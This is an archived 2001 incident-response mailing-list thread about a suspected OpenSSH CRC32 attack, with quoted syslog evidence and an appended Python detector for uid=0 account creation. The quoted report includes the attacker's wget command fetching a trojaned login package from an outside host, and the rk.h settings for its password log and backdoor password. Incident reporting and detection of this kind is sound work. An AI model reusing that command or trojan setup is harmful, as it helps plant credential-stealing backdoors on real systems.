Re: Attacks against SSH?

From: Aaron Schultz (aaronat_private)
Date: Mon Dec 03 2001 - 11:02:56 PST


    We've disabled the account where the group was storing the login.tgz file.
    The accounts are simply part of free hosting we provide, the box was not
    hacked.  See http://home.dal.net for more info about the setup.
    
    On a similar note, I've noticed scans to port 22 increase recently.
    
    - Aaron Schultz [Wagahai]
    - DALnet Webteam
    
    On Mon, 3 Dec 2001 johan.augustssonat_private wrote:
    
    > 
    > I stumbled over this post at the openssh-unix-dev mailing list last week -
    > http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=100701808712180&w=2
    > The poster claims that he had OpenSSH-2.9p2-8.7 (latest update for
    > RedHat 7.0) up and running when he received what looks to be a
    > CRC32-attack. A few minutes later you can see (he posted parts of the
    > logfile) a new user being created with uid=0 and then how a connection
    > is made from a system in Israel.
    > 
    > There has been no confirmation about what he writes but I received the
    > following mail as an answer to my questions.
    > 
    > ------ Message ------
    > I posted an openssh security alert earlier today and already got some
    > responses.
    > Thanks for everything.
    > 
    > Instead of replying to everyone individually I composed the details of
    > the attack.
    > 
    > +++
    > 
    > It does not look like the job of worms.
    > Snort did not detect a mass port scan from the attacker's IP address. It seems
    > that he (I assumed, so I don't have to type he/she all the way) just
    > wants to gain access through openssh.
    > 
    > The server is running Red Hat 7.0 with all packages up to date. The
    > following daemons are running: wu-ftpd, apache, telnet, openssh, named.
    > I never access the system via telnet, it is there just for backup
    > purposes.
    > 
    > > > Nov 25 11:37:40 ns sshd[10994]: Disconnecting: crc32 compensation attack: network attack detected
    > > > Nov 25 11:37:48 ns sshd[11006]: Disconnecting: Corrupted check bytes on input.
    > > > Nov 25 11:37:53 ns sshd[11013]: Disconnecting: Corrupted check bytes on input.
    > > > Nov 25 11:37:54 ns sshd[11014]: Disconnecting: Corrupted check bytes on input.
    > > > Nov 25 11:40:00 ns CROND[11022]: (root) CMD (   /sbin/rmmod -as)
    > > > Nov 25 11:40:08 ns adduser[11023]: new group: name=mattanl, gid=528
    > > > Nov 25 11:40:08 ns adduser[11023]: new user: name=mattanl, uid=528, gid=528, home=/home/mattanl, shell=/bin/bash
    > > > Nov 25 11:40:27 ns adduser[11027]: new group: name=mattan, gid=529
    > > > Nov 25 11:40:27 ns adduser[11027]: new user: name=mattan, uid=0, gid=529, home=/home/mattan, shell=/bin/bash
    > 
    > After the attacker gained root access, he created two users, mattan and
    > mattanl. He then downloaded a package: wget
    > http://home.dal.net/resolve/login.tgz.
    > The target site has been compromised (hacked by a hacker group in
    > Israel). This is a login replacement package; it logs the user IDs and
    > passwords. He modified rk.h to:
    > #define MY_LOGFILE "/dev/ttypz"
    > #define MY_PASSWORD "1245890"
    > After he compiled and installed the login replacement, something went
    > wrong: /bin/login was zero bytes in length. So when he came back using
    > telnet, he was denied access. I also disabled sshd and kept one session
    > open for remote control after I found login was replaced. I md5 checked
    > the system against a good backup; nothing else was altered.
    > 
    > I will try to sniff all packets that come to this server on the ssh port.
    > If he attempts to crack the server again, I will have more details. But I
    > guess I will have to turn the server back on.
    > 
    > Thanks for all your time
    > ------ End of message ------
    > 
    > I had some further questions so I mailed the guy once again but have not
    > received any answer.
    > 
    > So, to the main question:
    > Has anyone else had a system compromised by the CRC32-attack when
    > running a version of sshd that is believed to be secure? OpenSSH-2.3.0
    > or later, SSH 1.2.32 or later.
    > 
    > 
    > 
    > /Johan Augustsson
    > 
    > --------------------------------------------------------------------
    > Johan Augustsson                 Phone: +46 (0)31 773 1000
    > Incident Response Team           Fax: +46 (0)31 773 1087
    > Göteborg University              E-mail: Johan.Augustssonat_private
    > Sweden
    > --------------------------------------------------------------------
    > 
    > ----------------------------------------------------------------------------
    > This list is provided by the SecurityFocus ARIS analyzer service.
    > For more information on this free incident handling, management 
    > and tracking system please see: http://aris.securityfocus.com
    > 
    
    
    
    
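An added detection example, not part of this thread or of any product mentioned in it: it reads classic syslog lines like the excerpt quoted above and flags every uid=0 account creation, recording whether sshd logged a CRC32 compensation-attack signature within the preceding ten minutes. The sample log is constructed from the quoted excerpt with one benign control line added; the year 2001 is an assumption (syslog stamps carry none) and the ten-minute window is an arbitrary choice.

```python
import re
from datetime import datetime, timedelta

# Constructed sample modelled on the thread's syslog excerpt; "alice" is a benign control.
SAMPLE_LOG = """\
Nov 25 11:37:40 ns sshd[10994]: Disconnecting: crc32 compensation attack: network attack detected
Nov 25 11:37:48 ns sshd[11006]: Disconnecting: Corrupted check bytes on input.
Nov 25 11:37:53 ns sshd[11013]: Disconnecting: Corrupted check bytes on input.
Nov 25 11:40:00 ns CROND[11022]: (root) CMD (   /sbin/rmmod -as)
Nov 25 11:40:08 ns adduser[11023]: new user: name=mattanl, uid=528, gid=528, home=/home/mattanl, shell=/bin/bash
Nov 25 11:40:27 ns adduser[11027]: new user: name=mattan, uid=0, gid=529, home=/home/mattan, shell=/bin/bash
Nov 26 09:00:00 ns adduser[12001]: new user: name=alice, uid=1001, gid=1001, home=/home/alice, shell=/bin/bash
"""

# Classic syslog layout "Mon DD HH:MM:SS host prog[pid]: message"; the stamp carries no year.
SYSLOG_RE = re.compile(r"^(\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) (\S+) (\S+?)\[(\d+)\]: (.*)$")
# Messages the SSH-1 CRC32 compensation-attack detector logs on malformed packets.
SSH_ATTACK_MARKERS = ("crc32 compensation attack", "Corrupted check bytes on input")
NEW_USER_RE = re.compile(r"new user: name=(\S+), uid=(\d+),")


def parse_line(line, year):
    """Return (timestamp, program, message) or None if the line is not syslog-shaped."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
    return ts, m.group(3), m.group(5)


def find_uid0_after_ssh_attack(log_text, year=2001, window=timedelta(minutes=10)):
    """Flag every uid=0 account creation and record whether sshd logged a CRC32
    attack signature within `window` before it (the sequence seen in this thread)."""
    findings = []
    last_attack_ts = None
    for line in log_text.splitlines():
        parsed = parse_line(line, year)
        if parsed is None:
            continue
        ts, prog, msg = parsed
        if prog == "sshd" and any(marker in msg for marker in SSH_ATTACK_MARKERS):
            last_attack_ts = ts
        elif prog == "adduser":
            u = NEW_USER_RE.search(msg)
            if u and u.group(2) == "0":
                recent = last_attack_ts is not None and ts - last_attack_ts <= window
                findings.append({"name": u.group(1), "time": ts.isoformat(),
                                 "preceded_by_ssh_attack": recent})
    return findings
```

Run against the constructed log it reports only the mattan account, created 2 minutes 34 seconds after the last sshd attack signature; the mattanl (uid=528) and alice lines are not flagged.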
    



    This archive was generated by hypermail 2b30 : Mon Dec 03 2001 - 12:23:45 PST